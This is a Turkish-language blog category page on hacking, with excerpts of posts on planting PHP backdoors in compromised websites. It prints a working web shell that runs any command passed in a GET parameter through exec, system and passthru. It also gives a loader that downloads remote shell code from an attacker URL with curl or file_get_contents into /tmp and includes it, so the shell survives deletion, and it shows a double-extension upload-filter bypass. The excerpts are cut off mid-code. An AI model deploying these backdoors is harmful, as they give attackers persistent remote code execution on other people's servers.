İçeriğe geç

Kategori: Backdoor

backdoor

Siteye Backdoor Yerleştirmek – RCE (php backdoor)

GET ile istediğimiz işlemi yapabiliriz ister index.php dosyasına ister herhangi bir php dosyasına yerleştirebiliriz. Peki nasıl oluyor ? – Yazalım hemen. <!–?php $security= $_GET["ayar"]; if($security){ echo exec($security); echo shell_exec($security); echo proc_open($security); echo system($security); echo popen($security); echo passthru($security); } ?–> Şimdi geldi kullanmaya arkadaşlar, erişmiş olduğumuz sitede bir php dosyasının içine yukarıdaki…

servera yüklenen shell otomatik siliniyorsa

Kod: ‘; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?> yukarıda http://wwww.shellyolu.com/shell.txt olarak belirtilen yere kendi shell kodlarınızı txt olarak yüklediğiniz url yi girin ve php dosyasını servera upload edin. bu sayede tmp dizinine txt olarak belirtmiş olduğunuz…

Shell Upload Bypass

Shell upload bypass Kod: http://site.com/shell.txt editleyip kendi shell yolunuzu txt olarak ekleyin düzenlenen php dosyasını servera upload edin. Aynı dosyanın bulunduğu url de shell.png.phtml.pHP olarak shelliniz yüklenmiş olacaktır.

Sunucu otomatik shelli siliyorsa

Burada Url yazan yere çalıştırmak istediğin shellin linkini gir. Bu shell tmp dizinine atılır ve oradan çağırılarak çalıştırılır. <?php //*thanx for idx $URL = ‘http://shelladresi.com’; $TMP = ‘/tmp/sess_’.md5($_SERVER[‘HTTP_HOST’]).’.php’; # dont change this !! function M() { $FGT = @file_get_contents($GLOBALS[‘URL’]); if(!$FGT) { echo `curl -k $(echo {$GLOBALS[‘URL’]} | base64 -d) >…